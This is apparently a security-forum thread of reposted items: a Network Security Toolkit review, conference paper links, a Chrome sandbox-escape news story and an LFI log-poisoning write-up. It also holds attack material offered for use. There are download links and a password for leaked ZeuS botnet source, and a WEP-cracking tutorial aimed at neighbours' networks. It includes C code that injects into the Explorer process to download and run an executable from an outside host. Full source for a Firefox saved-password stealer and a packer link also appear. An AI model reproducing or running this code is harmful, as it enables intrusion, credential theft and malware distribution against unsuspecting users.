Nytro

Introduction to Network Security Toolkit (NST) The Network Security Toolkit (NST) is a ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article: Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live are: Ntop, wireshark, nmap with the vizualization tool ZenMap and kismet. Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are nmap with the vizualization tool ZenMap, ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management. You can read some of my articles about Nmap and Ntop following the links, for Nmap you got also Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database. On NST are also available Nagios and Argus, 2 software that can be used for network monitoring, you can check the status of various services, like web server, pop/imap mails erver or other services that in general you can test directly with a network connection. Another feature nice, and really “scenic” is that NST includes visualization of ntop, wireshark, traceroute and kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST use a custom tool: nstgeolocate — Geolocate hosts obtained from an ‘ntop’ session or Geolocate IPv4 Address conversations from a network packet capture file on a Mercator World Map projection or Global imagery. There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages. A great guide on what is available on the live distro and how to use each tools it’s present of the official wiki Conclusions This live CD it’s really filled with security tools and utility, so it could be really useful to set up in few minutes a location where you can do a security audit of a network or some hosts. It’s also really interesting the option to put it on a virtual machine, on the wiki there is a good how to on how to put NST on Virtualbox. So in few words: try and use it for your security audit, you’ll be satisfied for sure. Link: http://sourceforge.net/projects/nst/ Sursa (+video): » Linuxaria Introduction to Network Security Toolkit (NST)

Practical Android Attacks Bas Alberts + Massimiliano Oldani Immunity Inc. Attack Surface ? Remote: gain access ? Browser – WebKit ? Phone – Telephony stack ? Local: elevate privileges ? Kernel – Device drivers ? Userland – Zygote, ADBd, udev, etc Download: https://www.immunityinc.com/infiltrate/presentations/Android_Attacks.odt.pdf

Local File Inclusion to Remote Command Execution using SSH May 9th, 2011 at 21:15 by lanmaster53 Log poisoning has been used for years to upgrade local file inclusion vulnerabilities to remote command execution. In most cases, web server logs are used to execute such an attack. Most admins have become wise to the technique and do a decent job of preventing this. However, an equal amount of attention is not always paid to authentication logs. I was recently attempting to exploit a LFI vulnerability on a pen test and was having no luck poisoning the web server logs. Previous scans of the target showed that an OpenSSH service was running. I took one last shot at the LFI vulnerability and below was the result. I was shocked to find that auth.log was world readable. By default, OpenSSH makes an entry (consisting of the user name and other data) to auth.log for every authentication attempt made to the ssh daemon. Knowing this, I did some quick testing and found that I could inject php code into auth.log from the user name field of an ssh client by attempting to authenticate. The command took some time to get working right as bash requires finesse for processing special characters, but after some troubleshooting, I came up with the following: One issue I encountered is that OpenSSH makes 3 entries containing the user name to auth.log for every authentication attempt. In the following example, only one authentication attempt was made, but, as you can see, it appears in the log 3 times. The injected command will run 3 times unless php execution is terminated after the 1st command. I did this above with the exit; command. The unfortunate side effect is that you have one chance to get this right. Otherwise, you have to wait until the log cycles before you can make another attempt. Here is what the final product looked like with the addition of a pre-format tag for aesthetics. Sursa: Local File Inclusion to Remote Command Execution using SSH « LaNMaSteR53.blog Simplu si eficient

NoVirusThanks File Governor Easily unlock locked files and folders. File Governor is an advanced program which allows for files and folders within the system to be unlocked so that normal file I/O operations can be completed when normally they would not be able to be due to operating system restrictions for files currently in use. Once a file or folder is unlocked you will be able to force-close the file’s handle, rename, delete etc. File Governor is compatible with the following 32-bit and 64-bit Microsoft Windows Operating Systems: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 Screenshots Features Compatible with 32 & 64 bit OS Copy File to a User-Specified Directory Explorer Context Menu No Kernel Driver Needed Rename File to a User-Specified Filename Search for Locked Files Terminate Processes Unload DLL Unlock ALL Locked Files Unlock Single File Very user-friendly GUI Download: http://downloads.novirusthanks.org/files/filegovernor_setup.exe Portable: http://downloads.novirusthanks.org/files/portables/filegovernor_portable.zip Sursa: NoVirusThanks File Governor - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks

Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! Download: http://krash.in/real2/zeus.rar http://www.multiupload.com/P8QUNF4YJN Password: zeus Sursa: Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! ~ THN : The Hackers News Alternativ: http://www.megaupload.com/?d=LTJR7DHO https://rapidshare.com/files/461898687/ZeuS_2.0.8.9.zip http://uploading.com/files/626ff4fc/ZeuS%2B2.0.8.9.zip/

Clickjacking Paper Paul Stone, a consultant at Context, has conducted research into Clickjacking and produced a white paper which was premiered at Black Hat 2010, in a talk of the same title – Next Generation Clickjacking. Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe. Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice. Download: http://www.contextis.com/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf

Two Zero Day Flaws Used To Bypass Google Chrome Security May 10, 2011 | 02:02 PM By Kelly Jackson Higgins Dark Reading French researchers say they hacked their way out of browser's sandbox, bypassed DES and ASLR Researchers at French firm VUPEN Security yesterday posted a video of a hack they say they executed using two zero-day vulnerabilities in Google's Chrome browser that successfully bypassed its sandbox and other security features. VUPEN—which withheld technical details of the bugs in its disclosure--had not disclosed the bugs or any details to Google as of this posting. The security firm provides details of vulnerabilities it discovers to its paying government customers. "We did not publicly disclose any technical details of the vulnerabilities for security reasons. We did not send the technical details of the vulnerabilities to Google, and Google did not ask us to provide these details," says Chaouki Bekrar, CEO and head of research at VUPEN. A Google spokesperson said in a statement that without any details on the hack, the company is unable to verify it. "We're unable to verify VUPEN's claims at this time as we have not received any details from them. Should any modifications become necessary, users will be automatically updated to the latest version of Chrome," the spokesperson said. Chrome's sandbox features, which runs an application in a restricted environment to protect the system, as well as the use of ASLR and DEP, had made the browser relatively impenetrable to hackers. Adobe also uses Chrome's sandboxing technology, but VUPEN's Bekrar says Adobe's software is not vulnerable to the new hack. Bekrar says VUPEN employed two different bugs its researchers discovered: one that's exploited inside the sandbox, and one that's executed outside of it. "The first one results from a memory corruption leading to the execution of the first payload as low integrity level, inside the sandbox," he says. "A second payload is then used to exploit another vulnerability which allows the bypass of the sandbox and execution of the final payload with medium-integrity level, outside the sandbox." The exploit, demonstrated here using Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64), with the user being lured to visit a malware-rigged web page, also bypasses Microsoft's Address Space Layout Randomization (ASLR) security function and Data Execution Prevention (DEP) attack mitigation feature, and works on all Windows systems including Windows 7 Service Pack (SP) 1, Windows Vista SP2, and Windows XP SP3, according to Bekrar. Microsoft's ASLR protects Windows from an exploit attempting to call a system function: it places code in random areas of memory that make it more difficult for an attacker to run malware on a machine. DEP prevents an exploit from directly injecting and executing code from sections of memory used for data. VUPEN Security early last year said it was able to bypass DEP on IE 8 and execute arbitrary code, and that it had sent its exploit code to Microsoft to examine. Other vendors have demonstrated DEP and ASLR bypass attacks: Core Security Technologies discovered a flaw in Microsoft's Virtual PC hypervisor that can be used by an attacker to cheat DEP and ASLR. And independent researcher Peter Vreugdenhil at CanSecWest 2010 waged a heap overflow attack on IE 8 and used a zero-day vulnerability he discovered in the browser to bypass Windows 7's built-in anti-exploit features, Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). VUPEN's Bekrar says it took the researchers "many weeks" to find a way to bypass Chrome's sandbox. "Chrome has probably the most secure sandbox in the market, and it took us many weeks to find a way to bypass it," he says. "We have been looking into its whole attack surface and features to find a hole allowing the escape from the sandbox." Anup Ghosh, founder and chief scientist at Invincea, says it's no surprise that the sandbox was hacked. "We always knew from the very beginning, while an internal sandbox is a good idea, architecturally, you've still got a lot of residual attack space within the browser," Ghosh says. "It's always just been a question of when it would happen." And the hack highlights just how the sandbox—albeit an extra layer of security—is still just another piece of software that has vulnerabilities of its own, experts say. "Like other security features such as ASLR, sandboxes are very important as they make exploitation much harder and mitigate threats, however a sandbox is not unbreakable as it is itself a piece of software which can be affected by vulnerabilities," Bekrar says. Invincea's Ghosh says he expects the vulnerabilities to be exploited -- initially by sophisticated attackers targeting specific organizations, and then eventually, by organized crime syndicates. "I have no doubt that this vulnerability will be exploited. The fact that they are not making it public makes it far more valuable," he says. Meanwhile, there are no ways for Chrome users to protect themselves from these types of attacks. Sursa: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229403161/two-zero-day-flaws-used-to-bypass-google-chrome-security.html

Am uitat sa precizez sursa, am actualizat primul post.

How To Crack WEP using Backtrack w/Pictures Author: Warlock This tutorial is strictly educational, neither I, nor leetcoders is responsible for whatever trouble you may get into by using this method. Tinypic killed a couple of my images, I'm sure you can still manage to do it. Welcome to my tutorial, by the end of this tutorial, you should be able to have cracked your (or your nearby neighbors) WEP encrypted wifi. What you need: Backtrack 3 or 4 (In this tutorial I used 3, since I had it laying around) Which you can get here; Downloads A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine) Patience Assuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd. First of all, before you do anything, navigate to the wireless assistant; Start>Internet>Wireless Assistant If you do not see any networks, then this will not work for you. Open the konsole, which is here; Now type, airmon-ng It should show you your wireless card's info, like so; Now type airmon-ng stop (your interface) Should show you this; Now type ifconfig (your interface) down Then type macchanger --mac 00:11:22:33:44:55 (your interface) This spoofs your mac address, so your victim cannot figure out who you are. Type airodump-ng (your interface) This will open up a new konsole. Once you see the network you want to attack, press CTRL+C (This will stop your wirless card from searching for new networks) Open a new konsole Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface) Like so; It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.) Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup. Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface) Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface) Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C Now type aircrack-ng -b (bssid) (filename-01.cap) You have found the WEP key, mine being 77838557744334834238286364 (without the colons) And you're done! ~Warlock Sursa: LeetCoders

FWB++ FWB++ example by r3l4x[] (FWB stands for Firewall Bypass) /* Coder:Anskya,r3l4x[] */ #pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200") #pragma comment(linker,"/OPT:NOWIN98 /BASE:0x13140000 /INCREMENTAL:NO") #pragma comment(linker,"/ENTRY:Entrypoint /MERGE:.rdata=.text /MERGE:.data=.text") #pragma comment(lib, "urlmon.lib") #include <windows.h> unsigned long inject (void *) { URLDownloadToFile(0, "htt://Www.Anskya.Net/Test.exe", "C:\\xx.exe", 0, 0); WinExec("C:\\xx.exe", SW_SHOW); ExitThread(0); return 0; } void Entrypoint() { DWORD Size; PBYTE module; HANDLE process; DWORD PID; LPVOID NewModule; module = (PBYTE)GetModuleHandle(0); Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage; GetWindowThreadProcessId(FindWindow("shell_traywnd", NULL), &PID); process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID); VirtualFreeEx(process, module, 0, MEM_RELEASE); NewModule = VirtualAllocEx(process, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(process, NewModule, module, Size, NULL) CreateRemoteThread(process, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL); } Sursa: LeetCoders

Morphine Packer (C++ version) Author: holyfather This is a C/asm port to the original delphi code. Download: http://www.megaupload.com/?d=PU3FCSNN Sursa: http://leetcoders.org/showthread.php?t=167

FF pass Decrypt Firefox Password Decrypter by KriPpLer //----------------------------------------------------------------------- //////////////////////////////////////////////////////////// // Description: Firefox Password Cache Decrypter // Versions: Firefox 1, 2, and 3 // Author: KriPpLer // Language: C // Released: 9/9/2008 // URL: http://www.krippler.com/ /////////////////////////////////////////////////////////// // Credit: http://securityxploded.com/ (FF 2 Source) // Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip //////////////////////////////////////////////////////////// //----------------------------------------------------------------------- #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #include <userenv.h> #pragma comment(lib,"userenv.lib") //----------------------------------------------------------------------- //Firefox internal SEC structures typedef enum SECItemType { siBuffer = 0, siClearDataBuffer = 1, siCipherDataBuffer = 2, siDERCertBuffer = 3, siEncodedCertBuffer = 4, siDERNameBuffer = 5, siEncodedNameBuffer = 6, siAsciiNameString = 7, siAsciiString = 8, siDEROID = 9, siUnsignedInteger = 10, siUTCTime = 11, siGeneralizedTime = 12 }; struct SECItem { SECItemType type; unsigned char *data; unsigned int len; }; typedef enum SECStatus { SECWouldBlock = -2, SECFailure = -1, SECSuccess = 0 }; //----------------------------------------------------------------------- //Removes gecko-sdk dependency #define PRBool int #define PRUint32 unsigned int #define PR_TRUE 1 #define PR_FALSE 0 //Mozilla library names #define NSS_LIBRARY_NAME "nss3.dll" #define PLC_LIBRARY_NAME "plc4.dll" #define NSPR_LIBRARY_NAME "nspr4.dll" #define SQLITE_LIBRARY_NAME "sqlite3.dll" #define MOZCRT_LIBRARY_NAME "mozcrt19.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define PLDS_LIBRARY_NAME "plds4.dll" #define SOFTN_LIBRARY_NAME "softokn3.dll" #define LOADLIBRARY(x) LoadLibrary(x) #define GETPROCADDRESS GetProcAddress #define FREELIBRARY FreeLibrary //----------------------------------------------------------------------- const int buflen = 10240; static char readbuf[buflen+1]; static int last = 0; static int next = 0; typedef struct PK11SlotInfoStr PK11SlotInfo; // NSS Library functions typedef SECStatus (*NSS_Init) (const char *configdir); typedef SECStatus (*NSS_Shutdown) (void); typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void); typedef void (*PK11_FreeSlot) (PK11SlotInfo *slot); typedef SECStatus (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw); typedef SECStatus (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx); typedef SECStatus (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx); // PLC Library functions typedef char * (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest); // Function declarations.. void NSSUnload(); int InitFFLibs(char *firefoxPath); int InitializeNSSLibrary(char *profilePath, char *password); int CheckMasterPassword(char *password); int DirectoryExists( char *path ); void StrLwr(char *str); int OpenFile(char *filePath); void CloseFile(); int ReadLine(char *buffer, int size); char *GetFFProfilePath(); char *GetFFLibPath(); char *GetFFVersion(); char **Explode(char *StrIn,const char *Delimiter); char *Split(char *String,char Delimeter[],int Part); char *replace(char *str, const char *substr, const char *repstr); char ReadChar(); char Vers[_MAX_PATH] = ""; int version = 1; int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen); int Base64Decode(char *cryptData, char **decodeData, int *decodeLen); //----------------------------------------------------------------------- NSS_Init NSSInit = NULL; NSS_Shutdown NSSShutdown = NULL; PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL; PK11_CheckUserPassword PK11CheckUserPassword = NULL; PK11_FreeSlot PK11FreeSlot = NULL; PK11_Authenticate PK11Authenticate = NULL; PK11SDR_Decrypt PK11SDRDecrypt = NULL; PL_Base64Decode PLBase64Decode = NULL; int IsNSSInitialized = 0; HMODULE libnss = NULL; HMODULE libplc = NULL; HMODULE libtmp = NULL; FILE *signonFile = NULL; //----------------------------------------------------------------------- int OpenFile(char *filePath) { last = next = 0; signonFile = fopen(filePath, "r"); if( signonFile == NULL ) { return 0; //fail } return 1; } //----------------------------------------------------------------------- char ReadChar() { if (next >= last) { next = 0; last = fread(readbuf, 1, buflen, signonFile); if (last <= 0 ) { return 0; } } return (readbuf[next++]); } //----------------------------------------------------------------------- int ReadLine(char *buffer, int size) { unsigned int c; int strLength = 0, i=0; buffer[0] = 0; while(1) { c = ReadChar(); // eof reached if ( c == 0 ) // || feof(file) ) return 0; if (c == '\n') { buffer[strLength++] = 0; break; } if (c != '\r') { for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++) { if( strLength >= size ) { printf("\n Buffer is insufficient to store data"); return 0; } // Increase buffer capacity dynamically buffer[strLength++] = (char)c; c = c >> 8; } } } return 1; } //----------------------------------------------------------------------- //Misc functions int DirectoryExists( char *path ) { DWORD attr = GetFileAttributes(path); if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) ) { return 0; } return 1; } //----------------------------------------------------------------------- void StrLwr(char *str) { int n=strlen(str); for(int i=0; i<n; i++) { if( str[i] >=65 && str[i]<=90 ) str[i]+=32; } } //----------------------------------------------------------------------- //Loads specified firefox library with the given ffdir path as root HMODULE LoadLibrary(char *firefoxDir, char *libName) { char loadPath[4096]=""; strcpy(loadPath, firefoxDir); strcat(loadPath, "/"); strcat(loadPath, libName); libtmp = LOADLIBRARY(loadPath); if( !libtmp ) { return 0; //Failed to load library } return libtmp; } //----------------------------------------------------------------------- int InitFFLibs(char *FFDir) { libnss = libplc = NULL; //Load all required dll's if( FFDir != NULL ) { //Minor version check if(!LoadLibrary(FFDir, MOZCRT_LIBRARY_NAME)) //We are using version 2 or lower { goto version2; } else { if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLC_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, NSSU_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, SQLITE_LIBRARY_NAME) ) { } } } } } } version2: if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if( LoadLibrary(FFDir, SOFTN_LIBRARY_NAME) ) { libnss=LoadLibrary(FFDir, NSS_LIBRARY_NAME); if(libnss ) printf("\n\n Librarys loaded from master firefox path successfully"); } } } } } } // Now load from current path. if( !libnss ) { libnss =LOADLIBRARY(NSS_LIBRARY_NAME); libplc =LOADLIBRARY(PLC_LIBRARY_NAME); if( !libnss || !libplc ) { printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME); return 0; } } else { printf("\n Firefox Libraries loaded successfully"); } // Extract the required functions.... NSSInit = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init"); NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown"); PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot"); PK11FreeSlot = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot"); PK11Authenticate = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate"); PK11SDRDecrypt = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt"); PK11CheckUserPassword = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword"); if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword) { printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME); NSSUnload(); return 0; } // Get the functions from PLC library PLBase64Decode = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode"); if( !PLBase64Decode ) { printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME); NSSUnload(); return 0; } else { printf("\n Firefox library initialized successfully"); } return 1; } //----------------------------------------------------------------------- int InitializeNSSLibrary(char *profilePath) { IsNSSInitialized = 0; // Initialize the NSS library if( (*NSSInit) (profilePath) != SECSuccess ) { printf("\n\n NSSLib Initialization failed"); NSSUnload(); return 0; } else { IsNSSInitialized = 1; printf("\n NSS library initiliazed successfully"); } return 1; } //----------------------------------------------------------------------- void NSSUnload() { if( IsNSSInitialized && (NSSShutdown != NULL) ) (*NSSShutdown)(); if( libnss != NULL ) FREELIBRARY(libnss); //Free nss library if( libplc != NULL ) FREELIBRARY(libplc); //Free plc library } //----------------------------------------------------------------------- int DecryptStr(char *cryptData, char **clearData) { int decodeLen = 0; int finalLen = 0; char *decodeData = NULL; char *finalData = NULL; if( cryptData[0] != NULL ) { if( (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) ) { return 0; } // Do the actual PK11 decryption if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL)) { return 0; } *clearData = (char*) malloc( finalLen + 1 ); if( *clearData == NULL ) { printf("\n Insufficient memory"); return 0; } memcpy(*clearData, finalData, finalLen); *(*clearData + finalLen) = 0; // Null terminate string return 1; } if( Base64Decode(cryptData, clearData, &decodeLen) == 0 ) { return 0; } return 1; } //----------------------------------------------------------------------- int Base64Decode(char *cryptData, char **decodeData, int *decodeLen) { int len = strlen( cryptData ); int adjust = 0; if (cryptData[len-1] == '=') { adjust++; if (cryptData[len-2] == '=') adjust++; } *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL); if( *decodeData == NULL ) { return 0; } *decodeLen = (len*3)/4 - adjust; return 1; } //----------------------------------------------------------------------- int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen) { PK11SlotInfo *slot = 0; SECStatus status; SECItem request; SECItem reply; // Find token with SDR key slot = (*PK11GetInternalKeySlot)(); if (!slot) { return 0; } // Decrypt the string request.data = (unsigned char *)decodeData; request.len = decodeLen; reply.data = 0; reply.len = 0; status = (*PK11SDRDecrypt)(&request, &reply, NULL); if (status != SECSuccess) { return 0; } *clearData = (char*)reply.data; *finalLen = reply.len; // Free the slot (*PK11FreeSlot)(slot); return 1; } //----------------------------------------------------------------------- int DumpCache(char *profilePath,char *signonFile) { char buffer[10240]; char sbuffer[10240]; char name[10240]; char *clearData = NULL; int bufferLength = 10240; int count = 0; int ret; if( profilePath == NULL || signonFile == NULL) { return 0; } strcpy(sbuffer,profilePath); strcat(sbuffer,"\\"); strcat(sbuffer,signonFile); if(OpenFile(sbuffer) == 0 ) // Open the signon file { printf("\n\n Failed to open signon file: [%s], skipped. ", signonFile); return 0; } else { printf("\n\n ============================================================== "); printf("\n = %s = ",signonFile); printf("\n ============================================================== "); /*///////////////////////////////////////// Begin cache dump *////////////////////////////////////////// printf("\n\n ======================= Unmanaged URLS ======================= "); // Read out the unmanaged ("Never remember" URL list ReadLine(buffer, bufferLength); //Skip first line as its a useless version tag while (ReadLine(buffer, bufferLength) != 0) { // End of unmanaged list if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#') break; printf("\n %s ", buffer); } printf("\n ======================== Managed URLS ========================\n"); // read the URL line while (ReadLine(buffer, bufferLength) != 0 ){ printf("\n URL: %s ", buffer); //Start looping through final singon*.txt file while (ReadLine(buffer, bufferLength) != 0 ) { if (buffer[0] == '.') { printf("\n ==============================================================\n"); break; // end of cache entry } //Check if its a password if (buffer[0] == '*') { strcpy(name,&buffer[1]); ret = ReadLine(buffer, bufferLength); } else { printf("\n"); strcpy(name, buffer); ret = ReadLine(buffer, bufferLength); } if( DecryptStr(buffer, &clearData) == 1 ) { printf("\n %s: %s ", name, clearData); clearData = NULL; } } } printf("\n\n ============================================================== "); printf("\n = END %s = ",signonFile); printf("\n ============================================================== \n"); return 1; } /*///////////////////////////////////////// End pcache dump *////////////////////////////////////////// } //----------------------------------------------------------------------- // Find firefox path / libraries char *GetFFLibPath() { char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command"; char path[_MAX_PATH] =""; char *FFDir = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path if( RegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox path value from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || path[0] == 0) { printf("\n Unable to locate firefox installation path"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); // Remove extra quotes if( path[0] == '\"' ) { for(int i=0; i < strlen(path)-1 ; i++) path[i] = path[i+1]; } printf("\n Firefox main exe: %s", path); // Terminate the string at last "\\" for(int j=strlen(path)-1; j>0; j--) { if( path[j] == '\\' ) { path[j]=0; break; } } FFDir = (char*) malloc( strlen(path) + 1); if(FFDir) strcpy(FFDir, path); printf("\n Firefox path: %s", FFDir); return FFDir; } //----------------------------------------------------------------------- char *GetFFProfilePath() { char profilePath[_MAX_PATH] = ""; char partialPath[] = "Application Data\\Mozilla\\Firefox"; char profileFile[_MAX_PATH]; char line[1024]; DWORD pathSize = _MAX_PATH; char *finalProfilePath = NULL; int isDefaultFound = 0; HANDLE token; // Get current user's profile directory if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE ) { printf("\n Failed to get current process token "); return NULL; } if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE ) { printf("\n Failed to get user profile directory"); return NULL; } printf("\n User Profile directory: %s\n", profilePath); // Get firefox profile directory strcpy(profileFile, profilePath); strcat(profileFile,"\\"); strcat(profileFile,partialPath); strcat(profileFile,"\\profiles.ini"); // Open the firefox profile setting file FILE *profile = fopen(profileFile, "r"); if( profile == NULL ) { printf("\n Unable to find firefox profile file: %s ", profileFile); return NULL; } // This indicates that we are looking under default profile while(fgets(line, 1024, profile)) { StrLwr(line); if( !isDefaultFound && ( strstr(line, "name=default") != NULL) ) { isDefaultFound = 1; continue; } // Found default profile / check for path if( isDefaultFound ) { if( strstr(line,"path=") != NULL) { char *slash = strstr(line,"/"); if( slash != NULL ) *slash = '\\'; // remove \n from the end of line line[strlen(line)-1] = 0; char *start = strstr(line,"="); int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ; finalProfilePath = (char *) malloc(totalLen); if( finalProfilePath ) { strcpy(finalProfilePath,profilePath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,partialPath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,start+1); printf("\n Final profile path: %s \n", finalProfilePath); } break; } } } fclose(profile); return finalProfilePath; } //----------------------------------------------------------------------- char *GetFFVersion() { char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox"; char *FFVers = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path value if( RegQueryValueEx(rkey, "CurrentVersion", 0, &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox version from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || Vers[0] == 0) { printf("\n Path value read from the registry is empty"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); FFVers = (char*) malloc( strlen(Vers) + 1); if( FFVers ) strcpy(Vers,FFVers); if (FFVers[1] == '1') { version = 1; }else{ if (FFVers[1] == '2') { version = 2; }else{ if (FFVers[1] == '3') { version = 3; } } } printf("\n Firefox version: %d", version); return (FFVers); } //----------------------------------------------------------------------- int main(int argc, char* argv[]) { char *ProfilePath = NULL; //Profile path char *FFDir = NULL; //Firefox main installation path char buff[1024]; ProfilePath = GetFFProfilePath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox profile directory does not exist or no profiles found. \n"); return 0; } FFDir = GetFFLibPath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox installation path does not exist or is not installed. \n"); return 0; } if( InitFFLibs(FFDir) ) { if( InitializeNSSLibrary(ProfilePath) ) { //Take 3 Mozilla dumps DumpCache(ProfilePath,"signons.txt"); DumpCache(ProfilePath,"signons2.txt"); DumpCache(ProfilePath,"signons3.txt"); //DumpCache(ProfilePath,"signons.sqlite"); //Dont forget to flush :/ NSSUnload(); } } printf("\n ======================= End Cache Dump =======================\n"); while(1){ Sleep(10000); //Just loop until user exits } } //----------------------------------------------------------------------- Sursa: LeetCoders

